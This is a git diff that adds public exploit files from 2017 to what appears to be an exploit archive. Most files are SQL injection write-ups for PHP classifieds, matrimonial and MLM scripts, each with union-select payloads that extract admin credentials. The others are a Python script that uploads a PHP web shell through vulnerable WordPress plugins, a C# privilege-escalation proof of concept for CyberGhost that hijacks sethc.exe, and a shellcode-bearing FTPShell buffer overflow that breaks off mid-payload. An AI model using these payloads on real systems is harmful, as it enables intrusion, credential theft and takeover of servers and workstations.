+# -1'+/*!50000union*/+select+1,2,3,4,@@version,6-- -
+# -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- -
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- -
+# Etc... Etc...
+# # # # #
diff --git a/platforms/php/webapps/41523.txt b/platforms/php/webapps/41523.txt
new file mode 100755
index 000000000..44d282428
--- /dev/null
+++ b/platforms/php/webapps/41523.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: PHP Classifieds Rental Script v3.6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/php-classifieds-rental-script/
+# Demo: http://198.38.86.159/~classifiedscript/
+# Version: 3.6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/viewsubproducts.php?scatid=[SQL]
+# For example;
+# -2'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
+# admin:admin_id
+# admin:admin_name
+# admin:username
+# admin:adminpassword
+# -2'+/*!50000union*/+select+1,/*!50000concat*/(username,0x3a,adminpassword),3,4,0x496873616e2053656e63616e207777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+admin-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41524.txt b/platforms/php/webapps/41524.txt
new file mode 100755
index 000000000..cd462cbf5
--- /dev/null
+++ b/platforms/php/webapps/41524.txt
@@ -0,0 +1,30 @@
+# # # # # 
+# Exploit Title: Entrepreneur B2B Script v2.0.4 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/entrepreneur-b2b-script/
+# Demo: http://www.readymadeb2bscript.com/demo/entre-monicab2b/
+# Version: 2.0.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news-details.php?id=[SQL]
+# For example;
+# -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15--+-
+# admin :id
+# admin :title
+# admin :name
+# admin :last_name
+# admin :company
+# admin :sex
+# admin :username
+# admin :password
+# admin :ref_password
+# -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,/*!50000concat*/(username,0x3a,password),9,10,11,12,13,14,15+from+admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41525.txt b/platforms/php/webapps/41525.txt
new file mode 100755
index 000000000..eccfdaba3
--- /dev/null
+++ b/platforms/php/webapps/41525.txt
@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Matrimonial Script v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/matrimonial-script/
+# Demo: http://74.124.215.220/~matriialscrip/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/mother_tongue_search.php?/IhsanSencan&id=[SQL]
+# http://localhost/[PATH]/mother_tongue_search.php?/index_search_result.php?smart_search_gender=[SQL]Male&in_age_from=[SQL]18&in_age_to=[SQL]45&in_religion=[SQL]&in_mother=[SQL]&in_caste=[SQL]&in_country=[SQL]
+# For example;
+# -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+-
+# adminlogin :id
+# adminlogin :userid
+# adminlogin :password
+# adminlogin :email
+# -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,/*!50000concat*/(userid,0x3a,password),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+adminlogin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41526.txt b/platforms/php/webapps/41526.txt
new file mode 100755
index 000000000..2d93e2e46
--- /dev/null
+++ b/platforms/php/webapps/41526.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: MLM Binary Plan Script v2.0.5 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-binary-plan-script/
+# Demo: http://74.124.215.220/~binamlm/
+# Version: 2.0.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/testimonials_read.php?tid=[SQL]
+# For example;
+# -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8-- -
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),5,6,7,8+from+mlm_admin--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41527.txt b/platforms/php/webapps/41527.txt
new file mode 100755
index 000000000..2dd6c22fe
--- /dev/null
+++ b/platforms/php/webapps/41527.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: MLM Forced Matrix v2.0.7 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-forced-matrix/
+# Demo: http://74.124.215.220/~forctrix/
+# Version: 2.0.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -21'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -13'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41528.txt b/platforms/php/webapps/41528.txt
new file mode 100755
index 000000000..fd3fde7dd
--- /dev/null
+++ b/platforms/php/webapps/41528.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: MLM Forex Market Plan Script v2.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
+# Demo: http://74.124.215.220/~forexmlm/
+# Version: 2.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41529.txt b/platforms/php/webapps/41529.txt
new file mode 100755
index 000000000..f36f3eaec
--- /dev/null
+++ b/platforms/php/webapps/41529.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: MLM Membership Plan Script v2.0.5 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/mlm-membership-plan-script/
+# Demo: http://74.124.215.220/~membipmlm/
+# Version: 2.0.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# For example;
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+-
+# mlm_admin :admin_id
+# mlm_admin :admin_username
+# mlm_admin :admin_password
+# mlm_admin :admin_status
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6+from+mlm_admin--+-
+# -3'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),4,5,6,7+from+mlm_admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41530.txt b/platforms/php/webapps/41530.txt
new file mode 100755
index 000000000..0973b96b7
--- /dev/null
+++ b/platforms/php/webapps/41530.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Multireligion Responsive Matrimonial Script v4.7.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
+# Demo: http://74.124.215.220/~matridemo/multi-religion/
+# Version: 4.7.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search-smart-result.php?cityse=Smart+Search&gender=Male&subcaste=[SQL]&diet=[SQL]&smoke=[SQL]&drink=[SQL]&body_type=[SQL]&familyvalue=[SQL]&familystatus=[SQL]&asubmit=SEARCH
+# # # # #
diff --git a/platforms/php/webapps/41531.txt b/platforms/php/webapps/41531.txt
new file mode 100755
index 000000000..d16bcbaeb
--- /dev/null
+++ b/platforms/php/webapps/41531.txt
@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Network Community Script v3.0.2 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/network-community/
+# Demo: http://socialcommunityscript.com/products/business_network/
+# Version: 3.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/refer_job_view.php?jview=[SQL]
+# For example;
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23--+-
+# admin :admin_id
+# admin :admin_name
+# admin :username
+# admin :adminpassword
+# admin :email
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,/*!50000ConCat(*/username,/*!50000char*/(58),adminpassword),8,9,10,11,12,13,14,15,16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23+/*!50000from*/+admin--+-
+# Etc...
+# # # # #
+
+
diff --git a/platforms/php/webapps/41532.txt b/platforms/php/webapps/41532.txt
new file mode 100755
index 000000000..77999c480
--- /dev/null
+++ b/platforms/php/webapps/41532.txt
@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: PHP B2B Script v3.05 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/php-b2b-script/
+# Demo: http://readymadeb2bscript.com/product/basic/
+# Version: 3.05
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/companyinfo.php?id=[SQL]
+# http://localhost/[PATH]/latest_selling_leads_details.php?bid=[SQL]
+# http://localhost/[PATH]/company_profile.php?id=[SQL]
+# For example;
+# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24--+-
+# admin :username
+# admin :password
+# admin_login :id
+# admin_login :username
+# admin_login :password
+# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,/*!50000ConCat(*/username,/*!50000char*/(58),password),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24+from+admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41533.txt b/platforms/php/webapps/41533.txt
new file mode 100755
index 000000000..6f2d15ba5
--- /dev/null
+++ b/platforms/php/webapps/41533.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/
+# Demo: http://74.124.215.220/~responsivematri/
+# Version: 4.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/success_story.php?detail=[SQL]
+# http://localhost/[PATH]/search-results.php?gender=[SQL]Male&age_from=[SQL]&age_to=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&mothertongue=[SQL]&country=[SQL]&education=[SQL]&Submit=search
+# For example;
+# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14,15,16,17,18,19--+-
+# adminlogin :admin_id
+# adminlogin :admin_username
+# adminlogin :admin_password
+# adminlogin :admin_email
+# adminlogin :admin_usertype
+# -3'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,8,9,/*!50000ConCat(*/admin_username,/*!50000char*/(58),admin_password),11,12,13,14,15,16,17,18,19+from+adminlogin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41534.txt b/platforms/php/webapps/41534.txt
new file mode 100755
index 000000000..0154ca9d1
--- /dev/null
+++ b/platforms/php/webapps/41534.txt
@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Schools Alert Management Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Demo: http://www.schoolcollageerp.com/schoolalert/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/view_school_list.php?list_id=[SQL]
+# For example;
+# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),14,15--+-
+# admin :Id
+# admin :AdminName
+# admin :AdminPass
+# admin :AdminEmail
+# admin :CreatedDate
+# -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,/*!50000ConCat(*/AdminName,/*!50000char*/(58),AdminPass),14,15+from+admin--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41535.txt b/platforms/php/webapps/41535.txt
new file mode 100755
index 000000000..8462da4b1
--- /dev/null
+++ b/platforms/php/webapps/41535.txt
@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Select Your College Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/select-your-college-script/
+# Demo: http://schoolcollageerp.com/selectyourcollege/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/searchresult.php?institute=[SQL]
+# http://localhost/[PATH]/searchresult.php?namesearch&name=[SQL]
+# http://localhost/[PATH]/searchcourse.php?categoryid=[SQL]
+# http://localhost/[PATH]/collegedetails.php?id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41536.txt b/platforms/php/webapps/41536.txt
new file mode 100755
index 000000000..0e58d59d1
--- /dev/null
+++ b/platforms/php/webapps/41536.txt
@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: Social Network Script v3.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/social-network-script/
+# Demo: http://myeliteprofile.com/
+# Version: 3.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/[SQL]
+# http://localhost/scrapbook.php?id=[SQL
+# http://localhost/profile_social.php?id=[SQL
+# http://localhost/my_bookmark.php?id=[SQL
+# http://localhost/profile_social.php?mode=addbookmark&id=[SQL
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41539.txt b/platforms/php/webapps/41539.txt
new file mode 100755
index 000000000..e131743c4
--- /dev/null
+++ b/platforms/php/webapps/41539.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Website Broker Script v3.02 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/website-broker-script/
+# Demo: http://www.officialwebsiteforsale.com/official/
+# Version: 3.02
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/website_details_view.php?view=[SQL]
+# For example;
+# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+-
+# admin_login :id
+# admin_login :userid
+# admin_login :password
+# admin_users :user_id
+# admin_users :username
+# admin_users :password
+# -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+-
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41540.py b/platforms/php/webapps/41540.py
new file mode 100755
index 000000000..a32cc0527
--- /dev/null
+++ b/platforms/php/webapps/41540.py
@@ -0,0 +1,58 @@
+import requests
+import random
+import string
+print "---------------------------------------------------------------------"
+print "Multiple  Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
+print "---------------------------------------------------------------------"
+victim = raw_input("Please Enter victim host e.g. http://example.com: ")
+plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
+if plug_choice=="1":
+	plugin="zen-mobile-app-native"
+elif plug_choice=="2":
+	plugin="webapp-builder"
+elif plug_choice=="3":
+	plugin="wp2android-turn-wp-site-into-android-app"
+elif plug_choice=="4":
+	plugin="mobile-app-builder-by-wappress"
+elif plug_choice=="5":
+	plugin="mobile-friendly-app-builder-by-easytouch"
+else:
+	print "Invalid Plugin choice, I will now exit"
+	quit()	
+slug = "/wp-content/plugins/"+plugin+"/server/images.php"
+target=victim+slug
+def definShell(size=6, chars=string.ascii_uppercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+shellName= definShell()+".php"
+
+def checkExistence():
+	litmusTest = requests.get(target)
+	litmusState = litmusTest.status_code
+	if litmusState == 200:
+		print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
+		exploit()
+	else:
+		print "Target has a funny code & might not be vulnerable, I will now exit\n"
+		quit()
+	
+def exploit():
+	print "\nGenerating Payload: "+shellName+"\n"
+	myShell = {'file': (shellName, '<?php echo system($_GET[\'alien\']); ?>')}
+	shellEmUp = requests.post(target, files=myShell)
+	respShell = shellEmUp.text
+	cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
+	shellLoc = cleanURL.replace(" ", "")
+	print "Confirming shell upload by printing current user\n"
+	shellTest=requests.get(shellLoc+"?alien=whoami")
+	webserverUser=shellTest.text
+	if webserverUser == "":
+		print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
+		quit()
+	else:
+		print "The current webserver user is: "+webserverUser+"\n"
+		print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
+		quit()
+
+if __name__ == "__main__":
+	checkExistence()
diff --git a/platforms/windows/local/41538.cs b/platforms/windows/local/41538.cs
new file mode 100755
index 000000000..a92a881a3
--- /dev/null
+++ b/platforms/windows/local/41538.cs
@@ -0,0 +1,38 @@
+# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
+# Date: 06.03.2017
+# Software Link: http://www.cyberghostvpn.com/
+# Exploit Author: Kacper Szurek
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# Category: local
+  
+1. Description
+ 
+`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.
+
+https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html
+
+2. Proof of Concept
+
+using System;
+using CyberGhost.Communication;
+
+namespace cyber
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
+            Console.WriteLine("by Kacper Szurek");
+            Console.WriteLine("http://security.szurek.pl/");
+            Console.WriteLine("https://twitter.com/KacperSzurek");
+            PeLauncherOptions options = new PeLauncherOptions();
+            options.ExecuteableName = "sethc.exe";
+            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
+            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
+            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
+            Console.WriteLine("Now logout and then press SHIFT key 5 times");
+        }
+    }
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/41511.py b/platforms/windows/remote/41511.py
new file mode 100755
index 000000000..3afd7a606
--- /dev/null
+++ b/platforms/windows/remote/41511.py
@@ -0,0 +1,68 @@
+# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
+# Date: 2017-03-04
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://www.ftpshell.com/downloadclient.htm
+# Version: Windows Server 2008 R2 x64
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE: CVE-2017-6465
+
+# 2017-03-04: Software vendor notified
+# 2017-03-06: No reply
+# 2017-03-06: Publishing
+
+import socket
+import sys
+
+shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
+"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
+"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
+"\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
+"\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
